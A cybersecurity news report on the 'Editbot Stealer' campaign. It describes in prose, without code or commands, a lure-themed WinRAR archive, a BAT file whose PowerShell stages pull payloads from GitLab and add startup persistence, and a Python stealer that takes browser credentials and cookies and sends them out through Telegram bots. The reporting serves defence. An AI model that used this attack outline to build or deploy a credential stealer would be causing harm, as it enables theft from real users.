A new malicious campaign, Editbot Stealer, was discovered in which threat actors use WinRAR archive files with minimal detection to perform a multi-stage attack. Threat actors have been utilizing the theme of “defective product to be sent back” to lure users to their deceptive websites.
However, the malicious WinRAR archive used by the threat actors consists of a .bat file and a JSON file for initial stage attacks, followed by some Powershell commands for further stages. The distribution of these malicious files was done through social media.
Editbot Stealer in Action
Initial Access & Persistence
According to the reports shared with Cyber Security News, the BAT file used in the initial stages of the attack goes by the name â€œScreenshot Product Photo Sample.batâ€ containing multiple Powershell commands for downloading and executing additional payloads.
The first PowerShell command inside the BAT file downloads another BAT file from Gitlab and saves it under the name â€œWindowsSecure.batâ€ in the startup folder for persistent execution. This BAT file is used to regularly execute the Python stealer, which is downloaded later in the attack stage.
The second PowerShell command retrieves a ZIP file named â€œDocument.zipâ€ from the same GitLab repository and saves it in the C:\Users\Public directory. The third powershell command extracts this ZIP file into the C:\Users\Public\Documents directory containing the python stealer â€œlibb1.pyâ€.
Working of the Python Stealer – Editbot
The Python stealer consists of sophisticated programming code that performs several functions, including extracting the country code, IP address, and timestamp of the victims, along with the credential-stealing activities associated with several browsers.
This stealer extracts multiple pieces of information, such as cookies, login data, web data, and local state, from the browser profile folder and stores them inside the %temp% folder. All of the stolen information is stored in a text file named â€œpass.txtâ€.
After collecting all the information from the victim, the stealer creates a ZIP archive of all the extracted information and stores them inside the same %temp% directory. To exfiltrate this information, the threat actors have set up telegram bots.
Furthermore, a complete report about the Editbot stealer has been published, which provides detailed information on the source code, extraction method, and other information.